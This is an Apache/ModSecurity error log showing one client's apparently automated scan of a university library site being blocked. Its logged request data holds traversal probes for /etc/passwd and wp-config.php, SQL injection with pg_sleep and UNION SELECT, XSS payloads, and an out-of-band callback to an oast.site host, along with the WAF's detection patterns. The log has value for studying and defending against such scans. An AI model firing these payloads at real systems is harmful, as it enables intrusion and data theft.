[Tue Aug 29 11:36:25.130755 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11ycCo-f0AAAUbg6MAAABQ"]
[Tue Aug 29 11:36:25.200885 2023] [:error] [pid 1409] [client 143.42.78.27] ModSecurity: Rule 7fe1c67ac3c8 [id "981246"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "239"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "perpustakaan.unla.ac.id"] [uri "/xmlpserver/services/XMLPService"] [unique_id "ZO11ycCo-f0AAAWBBPsAAAAB"]
[Tue Aug 29 11:36:25.655079 2023] [:error] [pid 1423] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:table_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ); --\\x22 found within ARGS:table_name: pg_user\\x22; select pg_sleep(6); --\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/api/v2/open/rowsInfo"] [unique_id "ZO11ycCo-f0AAAWPpXcAAAAH"]
[Tue Aug 29 11:36:25.674737 2023] [:error] [pid 1423] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../..// found within ARGS:file_name: ../../../../../..//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/cgi-bin/tsaupload.cgi"] [unique_id "ZO11ycCo-f0AAAWPpXgAAAAH"]
[Tue Aug 29 11:36:27.236093 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11y8Co-f0AAAUbg7AAAABQ"]
[Tue Aug 29 11:36:28.443177 2023] [:error] [pid 1407] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/ccmivr/IVRGetAudioFile.do"] [unique_id "ZO11zMCo-f0AAAV-t90AAAAF"]
[Tue Aug 29 11:36:28.450510 2023] [:error] [pid 1449] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:true_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:true_path: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php/Pan/ShareUrl/downloadSharedFile"] [unique_id "ZO11zMCo-f0AAAWpXgEAAAAW"]
[Tue Aug 29 11:36:30.437055 2023] [:error] [pid 1435] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:folder. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:folder: ../../../../../../../../../../../../../../../etc/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11zsCo-f0AAAWbE94AAAAK"]
[Tue Aug 29 11:36:32.421602 2023] [:error] [pid 1448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO110MCo-f0AAAWoV1UAAAAV"]
[Tue Aug 29 11:36:33.531827 2023] [:error] [pid 1405] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO110cCo-f0AAAV9bzsAAAAA"]
[Tue Aug 29 11:36:33.590240 2023] [:error] [pid 1436] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: % found within ARGS:keyword: %61%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%27%27%2b%28%53%45%4c%45%43%54%20%6d%64%35%28%39%39%39%39%39%39%39%29%29%2b%27"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/mobile/plugin/browser.jsp"] [unique_id "ZO110cCo-f0AAAWcCRkAAAAL"]
[Tue Aug 29 11:36:34.363419 2023] [:error] [pid 1438] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:page: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/pandora_console/ajax.php"] [unique_id "ZO110sCo-f0AAAWexjYAAAAP"]
[Tue Aug 29 11:36:34.388497 2023] [:error] [pid 1423] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:ID: <svg onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO110sCo-f0AAAWPpYUAAAAH"]
[Tue Aug 29 11:36:36.938838 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ACS_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:ACS_path: ../../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/advanced_component_system/index.php"] [unique_id "ZO111MCo-f0AAAT@KzsAAAA2"]
[Tue Aug 29 11:36:37.400551 2023] [:error] [pid 1450] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:urlPath: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/getCorsFile"] [unique_id "ZO111cCo-f0AAAWqupsAAAAX"]
[Tue Aug 29 11:36:37.440437 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:urlPath: file:///c://windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/getCorsFile"] [unique_id "ZO111cCo-f0AAAT@K0EAAAA2"]
[Tue Aug 29 11:36:38.384084 2023] [:error] [pid 1450] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:href. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:href: ../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/_s_/dyn/Log_highlight"] [unique_id "ZO111sCo-f0AAAWqup4AAAAX"]
[Tue Aug 29 11:36:39.396498 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g54c9ucwichkny.oast.site found within TX:1: cjmnbitjmimt14dgn26g54c9ucwichkny.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword"] [unique_id "ZO1118Co-f0AAAShCdgAAAAi"]
[Tue Aug 29 11:36:41.484204 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cID: \\x22></iframe><svg/onload=alert(\\x222UdyWLo0lCLqcBCjs5YehILlcGu\\x22)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/ccm/system/panels/page/preview_as_user/preview"] [unique_id "ZO112cCo-f0AAAT@K1oAAAA2"]
[Tue Aug 29 11:36:42.355576 2023] [:error] [pid 1447] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO112sCo-f0AAAWnji8AAAAT"]
[Tue Aug 29 11:36:42.367178 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/LetsEncrypt/Index"] [unique_id "ZO112sCo-f0AAAT9PU4AAAA1"]
[Tue Aug 29 11:36:44.396974 2023] [:error] [pid 1450] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:idusuario. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:idusuario: '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/controller/login.php"] [unique_id "ZO113MCo-f0AAAWquqwAAAAX"]
[Tue Aug 29 11:36:45.401295 2023] [:error] [pid 1438] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:idusuario. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '' found within ARGS:idusuario: ''"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/controller/login.php"] [unique_id "ZO113cCo-f0AAAWexlEAAAAP"]
[Tue Aug 29 11:36:49.497363 2023] [:error] [pid 1461] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pdf. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:pdf: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/report/download.php"] [unique_id "ZO114cCo-f0AAAW1WcoAAAAD"]
[Tue Aug 29 11:36:56.566965 2023] [:error] [pid 1465] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:filename: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/wpsite-background-takeover/exports/download.php"] [unique_id "ZO116MCo-f0AAAW51X8AAAAF"]
[Tue Aug 29 11:36:57.571425 2023] [:error] [pid 1447] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )>\\x22@ found within ARGS:login: \\x22<svg/onload=alert(document.domain)>\\x22@gmail.com"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/thruk/cgi-bin/login.cgi"] [unique_id "ZO116cCo-f0AAAWnjo0AAAAT"]
[Tue Aug 29 11:37:07.961037 2023] [:error] [pid 1437] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/download.php"] [unique_id "ZO1188Co-f0AAAWdsosAAAAM"]
[Tue Aug 29 11:37:09.358969 2023] [:error] [pid 1469] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO119cCo-f0AAAW9ITEAAAAI"]
[Tue Aug 29 11:37:16.439419 2023] [:error] [pid 1454] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:tf_version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:tf_version: ' and (select pg_sleep(10)) ISNULL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/api/search/attribute"] [unique_id "ZO11-MCo-f0AAAWuq9kAAAAZ"]
[Tue Aug 29 11:37:16.556235 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 4"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/fuel/pages/items/"] [unique_id "ZO11-MCo-f0AAAUbhK4AAABQ"]
[Tue Aug 29 11:37:16.675082 2023] [:error] [pid 1469] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11-MCo-f0AAAW9IW0AAAAI"]
[Tue Aug 29 11:37:27.380557 2023] [:error] [pid 1474] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:appno. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union SELECT found within ARGS:appno:  1 union SELECT 98989*443131,1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/admin/"] [unique_id "ZO12B8Co-f0AAAXCUAUAAAAG"]
[Tue Aug 29 11:37:35.394732 2023] [:error] [pid 1409] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:log_filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:log_filename: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO12D8Co-f0AAAWBBUQAAAAB"]
[Tue Aug 29 11:37:37.515054 2023] [:error] [pid 1481] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php"] [unique_id "ZO12EcCo-f0AAAXJ6YoAAAAX"]
[Tue Aug 29 11:37:45.392842 2023] [:error] [pid 1449] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:dbkey:syslog.rlog. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:dbkey:syslog.rlog: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/page/sl_logdl"] [unique_id "ZO12GcCo-f0AAAWpXq8AAAAW"]
[Tue Aug 29 11:37:47.563712 2023] [:error] [pid 1455] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ):\\x0a     found within ARGS:script: from pyspider.libs.base_handler import *\\x0aclass Handler(BaseHandler):\\x0a    def on_start(self):\\x0a        print(str(452345672   567890765))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/debug/pyspidervulntest/run"] [unique_id "ZO12G8Co-f0AAAWvFMoAAAAa"]
